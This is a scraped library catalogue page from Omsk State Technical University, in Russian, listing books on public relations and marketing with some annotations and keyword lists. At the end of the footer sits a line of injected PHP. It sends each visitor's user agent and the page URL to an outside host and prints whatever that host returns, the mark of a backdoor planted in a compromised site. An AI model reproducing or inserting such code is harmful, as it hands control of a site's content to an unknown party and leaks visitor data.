Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

121 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Связь с общественностью")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 67
1. 
Паблик рилейшнз в культуре библиотек [Текст] : учебное пособие / ГПНТБ России, 2001. - 31 с.
Держатели документа (Информация об экземплярах) 
2. 
Связи с общественностью в политике и государственном управлении [Текст] / М. Г. Анохин, М. Д. Валовая, В. М. Горохов; В. С. Комаровский, 2001. - 520 с.
Держатели документа (Информация об экземплярах) 
3. 
Чумиков, Александр Николаевич. Связи с общественностью [Текст] : Учеб. пособие для управленч. специальностей вузов / А. Н. Чумиков, 2001. - 295 с.
Держатели документа (Информация об экземплярах) 
4. 
PR: международная практика [Текст] / Пер. с англ. Т. В. Астаховой, Н. В. Солнцевой, 1997. - 172 с.
5. 
Амблер, Тим. Практический маркетинг [Текст] / Т. Амблер; Пер. с англ. И. Петровой, В. Васильевой; Под общ. ред. Ю. Н. Каптуревского, 1999. - 395 с.
Держатели документа (Информация об экземплярах) 
6. 
Королько, Валентин Григорьевич. Основы паблик рилейшнз [Текст] : учеб. для высш. заведений образования: Пер. с укр. / В. Г. Королько; науч. ред. О. В. Некрасова, 2003. - 526 с.
Держатели документа (Информация об экземплярах) 

Паблик рилейшнз - <связь с общественностью> - выступают наивысшим достижением современной науки и искусства установления и поддержания конструктивных отношений между организацией или отдельным индивидом и окружающей их общественностью. В книге с учетом современной теории и зарубежного опыта изложены методологические и методически е основы учебной дисциплины "Паблик рилейшнз".

7. 
Технологии социальной работы [Текст] : Учеб. для вузов по направлению и специальности "Социальная работа" / Т. В. Шеляг, П. Д. Павленок, В. Ц. Худовердян и др.; Под общ. ред. Е. И. Холостовой, 2003. - 398, [1] с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- СОЦИАЛЬНАЯ -- ДЕЯТЕЛЬНОСТЬ -- ТЕХНОЛОГИЯ -- ДИАГНОСТИКА -- ЭКСПЕРТИЗА -- СОЦИАЛЬНОЕ ПРЕДВИДЕНИЕ -- СВЯЗЬ С ОБЩЕСТВЕННОСТЬЮ -- ОРГАНИЗАЦИОННО-управленческая -- СОЦИАЛЬНО-ЭКОНОМИЧЕСКИЙ МЕТОД -- СОЦИОЛОГИЧЕСКАЯ -- СОЦИАЛЬНО-ПЕДАГОГИЧЕСКИЙ МЕТОД -- ПСИХОЛОГИЧЕСКИЙ МЕТОД -- МЕДИКО-СОЦИАЛЬНАЯ РАБОТА -- СЕМЬЯ -- ЖЕНЩИНА -- ПОЖИЛОЙ ЧЕЛОВЕК -- РЕБЕНОК -- ПОДРОСТОК -- МОЛОДЕЖЬ -- ИНВАЛИД -- МИГРАНТ -- БЕЖЕНЕЦ -- НАЦИОНАЛЬНОЕ МЕНЬШИНСТВО -- ВОЕННОСЛУЖАЩИЙ

Преподавание курса "Технологии социальной работы" является сравнительно новым для отечественной системы высшего образования, поэтому количество учебников пока незначительно, а единое понимание многих вопросов отсутствует.

Данный учебник составлен на основе курсов лекций, прочитанных в ряде ведущих вузов страны. Создание книги соответствует предметному плану и программе курса. Тем не менее замечания и предложения читателей будут способствовать дальнейшей работе над учебником в целях его совершенствования и уточнению теоретических и методических проблем социальных наук в целом.

Для преподавателей, аспирантов и студентов, изучающих учебный курс "Технологии социальной работы" в процессе подготовки и переподготовки по специальности и направлению "Социальная работа".

8. 
Дойль, Питер. Маркетинг-менеджмент и стратегии [Текст] / П. Дойль; Пер. с англ. С. Жильцова; Под общ. ред. Ю. Н. Каптуревского, 2003. - 538 с.
Держатели документа (Информация об экземплярах) 

Учебник по менеджменту и маркетингу Питера Дойля является наиболее полным и удобным для изучения из всех ранее издававшихся. Неслучайно первое его издание удостоилось звания "Лучший учебник по менеджменту в Европе". Авто рассматривает все основные аспекты современного управления и маркетинга: <стратегическое> <рыночное планирование>, <брендинг>, <инновации>, <ценообразование>, <антикризисное управление>, уделяя большое внимание актуальности публикуемого материала. Питер Дойль, не навязывая своих взглядов, позволяет читателю делать выбор и размышлять, самому находить пути решения поставленных задач и проблем.

9. 
Василенко, Александр Борисович. Пиар крупных российских корпораций [Текст] / А. Б. Василенко, 2002. - 304 с.
Держатели документа (Информация об экземплярах) 

Книга посвящена вопросам пиар-деятельности крупных российских <компаний>. В ней рассматриваются общие положения пиара и особенности работы служб по связям с общественностью в современных российских условиях. Специальное внимание уделяется проблеме создания <имиджа> компании, взаимоотношениям со <СМИ>, государственными и общественными организациями и др. Книга содержит множество ценных рекомендаций по проведению разнообразных пиар-<кампаний> и может служить учебным пособием по теории и практике пиара.

10. 
Армстронг, Гари. Введение в маркетинг [Текст] : Пер. с англ. / Г. Армстронг, Ф. Котлер; Н. В. Шульпина, 2000. - 638 с.
Ключевые слова 
Маркетинг -- Учебник и пособие -- Управление маркетингом -- Маркетинговое исследование -- Потребительский рынок -- Стратегическое планирование -- Клиент -- Конкурент -- Маркетинговая информационная система -- Маркетинг услуг -- Товар -- Ценообразование -- Цена -- Товародвижение -- Логистика -- Розничная торговля -- Оптовая торговля -- Маркетинговая коммуникация -- Связь с общественностью -- Реклама -- Стимулирование сбыта -- Прямой маркетинг -- Интерактивный маркетинг -- Социальная ответственность -- Консьюмеризм -- Инвайронментализм -- Глобальный маркетинг -- Глобальный рынок -- Личная продажа -- Покупательское поведение -- Маркетинговая среда
Держатели документа (Информация об экземплярах) 
11. 
Котлер, Филип. Маркетинг менеджмент [Текст] / Ф. Котлер; Т. Виноградова, Л. А. Волкова, Ю. Н. Каптуревский, 2000. - 749 с.
Ключевые слова 
Маркетинг -- Менеджмент -- Маркетинговая стратегия -- Конкуренция -- Товар -- Потребитель -- Рынок -- Маркетинговое планирование -- Маркетинговое исследование -- Потребительский рынок -- Упаковка -- Этикетка -- Сервис -- Цена -- Ценообразование -- Розничная торговля -- Оптовая торговля -- Логистика -- Маркетинговая коммуникация -- Управление рекламой -- Стимулирование сбыта -- Связь с общественностью -- Прямой маркетинг -- Онлайновый маркетинг -- Личная продажа -- Маркетинговый канал -- Маркетинговая среда
Держатели документа (Информация об экземплярах) 
12. 
Леви, Майкл. Основы розничной торговли [Текст] / М. Леви, А. Вейтц; С. Жильцов, Ю. Н. Коптуревский, 1999. - 446 с.
Ключевые слова 
Торговля -- Розничная торговля -- Покупатель -- Конкурент -- Бизнес -- Менеджмент -- Фирма -- Торговля-микс -- Собственность -- Франчайзер -- Покупка -- Рынок -- Товар -- Принятие решения -- стратегическое планирование -- Магазин -- Управление товаром -- Планирование -- Ассортимент -- Закупка -- Поставщик -- Переговоры -- Ценообразование -- Цена -- Бюджет -- Коммуникация -- Сбыт -- Связь с общественностью -- Стимулирование -- Менеджер -- Обучение -- Заработная плата -- Вознаграждение -- Дизайн -- Обслуживание -- Продажа -- Модный товар -- Услуга -- Компания
13. 
Синяева, Инга Михайловна. Паблик рилейшнз в коммерческой деятельности [Текст] : Учеб. для вузов по экон. специальностям / Синяева Инга Михайловна; Г. А. Васильев, 1998. - 287 с.
Держатели документа (Информация об экземплярах) 
14. 
Разроев, Элдар. Маркетинг сотовой связи [Текст] / А. Разроев, 1999. - 160 с.
Ключевые слова 
Сотовая связь -- Маркетинг -- Конкуренция -- Телекоммуникационный рынок -- Прогнозирование -- Инвестиционный ресурс -- Бизнес -- Планирование -- Маркетинговое исследование -- Сотовая сеть -- Спрос -- Сегментация -- Позиционирование -- Ценообразование -- Цена -- Коммуникация -- Реклама -- Связь с общественностью -- Продажа -- Абонент -- Абонентское обслуживание -- Инфраструктурный резерв -- Сотовая технология -- Абонент -- Абонентское -- обслуживание -- Инфраструктурный -- резерв -- Сотовая
Держатели документа (Информация об экземплярах) 
15. 
Уэллс, Уильям. Реклама: принципы и практика [Текст] / У. Уэллс, Д. Бернет, С. Мориарти; М. Артюх, 1999. - 735 с.
Держатели документа (Информация об экземплярах) 
16. 
Хэйвуд, Роджер. Все о Public Relations [Текст] : Как добиться успеха в бизнесе, используя связи с общественностью: Пер. с англ. / Р. Хэйвуд, Р. Хейвуд, 1999. - 255 с.
Держатели документа (Информация об экземплярах) 
17. 
Татаринова Г. Н. Введение в специальность "Связи с общественностью" [Текст] : Учеб.-метод. пособие / Г. Н. Татаринова, 2000. - 45 с.
Держатели документа (Информация об экземплярах) 
Полный текст
18. 
Абчук, Владимир Авраамович. Коммерция [Текст] : Учеб. / В. А. Абчук, 2000. - 474 с.
Ключевые слова 
Коммерция -- Коммерческая деятельность -- Учебник и пособие -- Бизнес -- Предпринимательская деятельность -- Предпринимательство -- Торговля -- Менеджмент -- Прибыль -- Финансирование -- Кредитование -- Убыток -- Коммерческое предприятие -- Планирование -- Анализ предприятия -- Товародвижение -- Товар -- Купля-продажа -- Продажа -- Обязательство -- Договорное обязательство -- Связь с общественностью -- Паблик рилейшнз -- Презентация -- Реклама -- Риск -- Коммерческий риск -- Коммерческая прибыль -- Международная коммерция -- Коммерческий расчет
19. 
Пашенцев, Евгений Николаевич. Паблик рилейшнз: от бизнеса до политики [Текст] / Е. Н. Пашенцев, 2000. - 230 с.
Держатели документа (Информация об экземплярах) 
20. 
Как составить план по маркетингу сервисной компании [Текст] : Пер. с англ. / С. О. Календжян, 1997. - 80 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3023 - 19.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.94 с.12 запросов, 0.62c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;